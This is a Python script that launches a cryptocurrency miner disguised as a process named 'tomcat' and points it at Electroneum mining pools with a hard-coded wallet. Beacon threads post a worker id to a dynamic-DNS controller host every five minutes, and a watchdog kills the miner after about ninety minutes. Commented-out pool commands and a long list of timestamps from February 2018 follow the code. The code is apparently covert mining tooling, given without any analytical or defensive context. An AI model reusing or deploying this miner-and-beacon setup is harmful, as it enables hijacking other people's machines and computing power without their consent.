import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:40:06.458911
#2018-02-17 16:26:05.157494
#2018-02-17 18:13:04.179808
#2018-02-17 20:00:04.373358
#2018-02-17 21:48:05.660357
#2018-02-17 23:33:07.025493
#2018-02-18 01:22:01.571803
#2018-02-18 03:09:03.435067
#2018-02-18 04:58:05.382321
#2018-02-18 06:52:05.515661
#2018-02-18 08:41:05.612937
#2018-02-18 10:27:02.061051
#2018-02-18 12:13:06.296408
#2018-02-18 13:59:04.483073
#2018-02-18 15:49:03.917445
#2018-02-18 17:39:04.659323
#2018-02-18 19:27:01.546026
#2018-02-18 21:11:01.363996
#2018-02-18 22:58:01.261858
#2018-02-19 00:45:07.486087
#2018-02-19 02:32:06.823310
#2018-02-19 04:18:03.200600
#2018-02-19 06:02:06.180291
#2018-02-19 07:50:07.069123
#2018-02-19 09:40:09.824119
#2018-02-19 11:29:07.675731
#2018-02-19 13:17:05.716484
#2018-02-19 15:04:07.528040
#2018-02-19 16:52:06.155154
#2018-02-19 18:40:05.808189
#2018-02-19 20:26:08.138960
#2018-02-19 22:14:01.892837
#2018-02-20 00:00:07.997547
#2018-02-20 01:47:06.054411
#2018-02-20 03:33:06.236785
#2018-02-20 05:20:01.999455
#2018-02-20 07:03:07.759008
#2018-02-20 08:50:09.743160
#2018-02-20 10:34:05.182930
#2018-02-20 12:19:01.844877
#2018-02-20 14:06:10.034949
#2018-02-20 15:50:09.137201
#2018-02-20 17:35:05.982891
#2018-02-20 19:23:07.822310
#2018-02-20 21:13:07.905142
#2018-02-20 22:59:08.241476
#2018-02-21 00:42:08.272205
#2018-02-21 02:28:02.219090
#2018-02-21 04:13:04.606582
#2018-02-21 06:01:01.997189
#2018-02-21 07:49:05.440144
#2018-02-21 09:35:06.260898
#2018-02-21 11:23:07.313386
#2018-02-21 13:12:05.445651
#2018-02-21 14:59:01.902986
#2018-02-21 16:48:05.999718
#2018-02-21 18:37:08.022353
#2018-02-21 20:22:03.696051
#2018-02-21 22:10:04.215097
#2018-02-21 23:58:07.282116
#2018-02-22 01:48:06.009382
#2018-02-22 03:34:07.822901
#2018-02-22 05:21:01.259133
#2018-02-22 07:05:06.758223
#2018-02-22 08:51:06.500375
#2018-02-22 10:39:01.506828
#2018-02-22 12:25:08.131646
#2018-02-22 14:10:01.264448
#2018-02-22 15:56:01.669257
#2018-02-22 17:43:02.009464
#2018-02-22 19:29:02.139849
#2018-02-22 21:21:03.879314
#2018-02-22 23:06:04.465675
#2018-02-23 00:52:08.106120
#2018-02-23 02:41:07.273042
#2018-02-23 04:31:04.185462
#2018-02-23 06:17:01.644814
#2018-02-23 08:05:07.128221
#2018-02-23 10:21:06.931730
#2018-02-23 12:13:05.468323
#2018-02-23 13:59:01.671736
#2018-02-23 15:51:04.967881
#2018-02-23 17:37:05.550219
#2018-02-23 19:23:06.903488
#2018-02-23 21:07:08.315691
#2018-02-23 22:53:06.048215
#2018-02-24 00:41:05.113265
#2018-02-24 02:31:08.123058
#2018-02-24 04:25:05.958597
#2018-02-24 06:11:04.726638
#2018-02-24 07:58:05.463974
#2018-02-24 09:42:03.702528
#2018-02-24 11:37:04.227717
#2018-02-24 13:27:07.817852
#2018-02-24 15:16:04.409786
#2018-02-24 17:05:05.849811
#2018-02-24 18:56:05.027835
#2018-02-24 20:43:03.451269
#2018-02-24 22:56:08.183323
#2018-02-25 02:15:05.418456
#2018-02-25 05:48:06.679369
#2018-02-25 11:37:02.411549